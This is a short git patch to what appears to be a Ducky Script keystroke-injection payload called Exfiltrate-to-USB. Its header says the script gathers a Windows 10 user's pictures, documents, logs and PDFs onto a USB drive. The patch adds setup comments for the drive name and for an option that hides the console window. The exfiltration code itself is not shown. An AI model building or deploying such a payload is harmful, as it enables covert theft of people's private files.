From 687ea57bfd189983d3c26da9f7146ebff69af342 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Sat, 30 Dec 2023 01:02:52 +0000 Subject: [PATCH] Update Exfiltrate-to-USB.txt --- Exfiltrate-to-USB/Exfiltrate-to-USB.txt | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/Exfiltrate-to-USB/Exfiltrate-to-USB.txt b/Exfiltrate-to-USB/Exfiltrate-to-USB.txt index fb28675..6831806 100644 --- a/Exfiltrate-to-USB/Exfiltrate-to-USB.txt +++ b/Exfiltrate-to-USB/Exfiltrate-to-USB.txt @@ -4,6 +4,10 @@ REM Author: @beigeworm REM Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to newly connected USB drive. REM Target: Windows 10 +REM SETUP (optional) +REM Add your USB drive Name in quotes for $driveName +REM Add Y or N in quotes for $Hidden (hides console window) + REM some setup for dukie script DEFAULT_DELAY 100